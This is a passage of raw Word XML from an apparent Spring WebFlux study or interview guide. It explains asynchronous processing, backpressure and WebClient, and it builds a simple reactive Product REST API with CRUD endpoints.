        <w:t xml:space="preserve"> (Mono or Flux) that will eventually emit a result asynchronously. The </w:t>
      </w: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 xml:space="preserve"> processes these events asynchronously and efficiently, reacting to each HTTP request as an event and completing the associated response when the event has been fully processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEC4B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0328E06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allows you to control the execution context of asynchronous operations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For example, tasks like database queries or external API calls can be run on a different thread pool to avoid blocking the main event loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52363A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 xml:space="preserve"> methods are used to specify the thread on which to run the task (for example, using a thread pool to perform I/O operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0565406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1864A52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ackpressure refers to situations where a publisher is producing events faster than a subscriber can consume them. WebFlux uses mechanisms from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6A9EB0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used to perform asynchronous HTTP requests in a non-blocking manner. It's part of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module and allows for efficient communication with other services or APIs while handling the responses reactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAA055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ensures that Spring WebFlux can make external API calls without blocking the thread that initiated the request, allowing the server to handle other requests concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189AE0DA"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Workflow in Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B0B8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r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9B492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a request comes in, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dispatcher servlet</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or the equivalent for non-servlet environments like Netty or Undertow) routes it to the appropriate handler (controller method).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2652153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troller method returns a reactive type (Mono or Flux) that represents an asynchronous computation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3604B3B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ipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6FAAC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side the handler method, you can chain together operations such as calling external services, querying databases, or processing the data. These operations return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or Flux), and each operation is performed asynchronously, using non-blocking I/O.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF6933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 a call to a database or a remote service can be done asynchronously, and the request will continue to process other operations while waiting for the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617999F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Emission</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11155B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 data becomes available (e.g., the result of a database query or HTTP request), it is emitted by the reactive stream (Mono or Flux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B50CB8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rs to this stream will receive the data asynchronously, without blocking the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D645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inal Response</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621F5D8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Asynchronous Communication in Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580E5FD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F87D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AsynchronousController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498AD038" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D62C60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method (non-blocking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015360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async")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B70CC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AsyncResponse() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6771B44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Processing Request...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101E4E4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Duration.ofSeconds(2))  // Simulating async operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ADD9F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ult -&gt; result + " Finished!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299114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CD79DA" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC86EE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call to another service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A52303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external-api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E10613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callExternalApi() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556EF79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create("https://api.example.com")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1C352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5E2F7A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5E6DD6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6B7A1C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API Response: " + response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC7339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1283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73DD5C4"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the Above Example Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3EAA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AsyncResponse()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41182D9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a Mono&lt;String&gt; that simulates a delayed (non-blocking) operation with delayElement. The request is processed asynchronously, and the client will receive the result once the delay is over.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A60C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llExternalApi()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587FD1D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Asynchronous Communication in Event-Driven Systems with WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F995BE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4966E4D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handles asynchronous operations without blocking the thread, allowing the system to scale efficiently, especially in I/O-bound workloads (e.g., file operations, database queries, or external API calls).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B65C9A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF4B77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ultiple requests can be processed concurrently without blocking, as each request can run on its own thread or be processed in the event loop asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792F673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 Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A975CAF"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processing reduces the latency in systems, particularly when waiting for external resources, as threads are not held up and can handle other tasks during waiting periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCB65F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tilization</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1512832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threads are not blocked, the system can process more requests with fewer resources, making it ideal for microservices or cloud-native applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023E364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Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B503B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provides built-in mechanisms to handle backpressure, ensuring the system remains responsive under high load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665CF0C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Spring WebFlux handles asynchronous communication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321" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A545B4C" w14:textId="62C31FE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5" w:name="_Toc197867749"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How would you use Spring WebFlux to implement a simple reactive REST API</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="535"/>
    </w:p>
    <w:p w14:paraId="6063ABF2" w14:textId="74966628"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mplement a simple reactive REST API using Spring WebFlux, you'll follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC85B3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t Up Spring WebFlux Dependency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that your project is set up to use Spring WebFlux. You can add the required dependency in the pom.xml for Maven or build.gradle for Gradle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2361752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the Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD816F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38F695C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C605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F689EC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BA11D5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EEEE6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E1AE9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83595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F06D0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lt;/artifactId&gt; &lt;!-- For database interaction --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3371B2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E714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Optionally include an in-memory database or your actual DB --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B04EB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DDED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68BBA6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1F2D4B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BD611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  // If you're using MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6FB92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1E6E85"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Reactive Model (Entity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82D95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Product entity, which we will use as a model for our API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD9474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data.annotation.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8F8898" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2677EB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roduct {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A508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133C3F1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094C92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599251C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D57F431" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="123FDEC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37527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String id, String name, double price) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7197D5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8DEC08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448D58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7D92D0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488BE4" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2B58F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1000928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010167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EAD25D" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249511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05DF812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A6A3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F5377C" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="655E494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D2E93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ED958A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2B5CFA" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119AE0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7D99D3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1158EC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B7AC338" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F9FEF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45C4DE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2C864E1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6FA8BE" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A964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6A88310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5CD3D1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ACB47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949D7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active Repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41699C5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or ReactiveMongoRepository for MongoDB or any other reactive database library, depending on your choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9FCC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0C645177" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F95F8E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ProductRepository extends ReactiveCrudRepository&lt;Product, String&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B8CD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D7E25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Controller for Reactive API Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A13C8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stController that handles HTTP requests reactively. Spring WebFlux uses Mono (for a single result) and Flux (for multiple results) as return types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408513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20E6C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0F4134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3987E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1C475CB8" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78BCCB6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7DD4BA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products")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F5AA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ProductController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA29B13" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C2400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ProductRepository productRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C218AAB" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD1AD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FFC7F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Controller(ProductRepository productRepository) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF931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oductRepository = productRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6479EAD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32F0A8" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2147198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 single product by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA0D6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9D01FD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getProductById(@PathVariable String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4061B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7FA20B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6911222" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067157A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ll products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453B74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4F461B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Product&gt; getAllProducts() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E550D9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All();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF7DD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FE601B" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B98D8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 a new product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307743D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6A7291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createProduct(@RequestBody Product product) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4835984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product);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1F524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BA44503" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F84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Update a product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF0EAE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tMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17703AA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updateProduct(@PathVariable String id, @RequestBody Product product) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478786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352E18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existingProduct -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44656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Name(product.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006067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Price(product.getPrice());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6B16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existingProduct);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60468A2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D2E557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064E1" w14:textId="77777777" w:rsidR="001E5AD9" w:rsidRPr="00B13F85" w:rsidRDefault="001E5AD9" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7AF89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product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA04F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eteMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101A22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Product(@PathVariable String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A2EAF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deleteById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661DF84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C991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D65AE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xplanation of the Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436B41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Represents a single asynchronous value or an empty asynchronous result. It's used for endpoints that return a single object (e.g., fetching a single product by its ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AA07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Represents an asynchronous stream of 0 to N elements. It's used for endpoints that return multiple items (e.g., fetching all products).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E12E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1EC9401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ProductById: Fetches a product by its ID and returns it as a Mono&lt;Product&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACE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AllProducts: Returns all products as a Flux&lt;Product&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F325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Product: Accepts a POST request and saves a new product, returning a Mono&lt;Product&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30023BD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pdateProduct: Accepts a PUT request, updates an existing product, and returns the updated product wrapped in a Mono.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BEFCB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teProduct: Deletes a product by ID and returns a Mono&lt;Void&gt; to signify the completion of the operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F23FF1"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6. Running the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8BC8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768E5F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   # For Maven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEABF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r if you're using Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECECE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   # For Gradle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED71E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be running on http://localhost:8080 by default, and you can test the endpoints via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1DC9BE1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xample Requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F46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 – Fetch all products.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A033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id} – Fetch a product by its ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2EF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api/products – Add a new product. (Request body contains product details)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF91CD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api/products/{id} – Update a product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D32A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xml:space="preserve"> /api/products/{id} – Delete a product.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111859B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What Makes It Reactive?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3727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The database queries are executed asynchronously, and the application doesn't block the main thread while waiting for a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F678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The Mono and Flux are returned by the controller methods, indicating that the API will handle asynchronous processing of the requests and responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E745D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If the number of emitted items exceeds the ability of the consumer to process them, backpressure is handled efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C8F8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Benefits of Reactive Programming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5AD1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etter scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring WebFlux can handle many more concurrent requests because it doesn't block threads when waiting for I/O operations (such as database access, external HTTP calls, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5617D92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ponsiveness</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It can scale to handle high numbers of requests with low latency, which is ideal for modern applications requiring real-time data processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF3A3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architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It makes the system more efficient, especially when handling I/O-bound tasks, as threads are not blocked waiting for operations to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC63EF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C6B88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example demonstrates how to create a simple </w:t>
      </w:r>
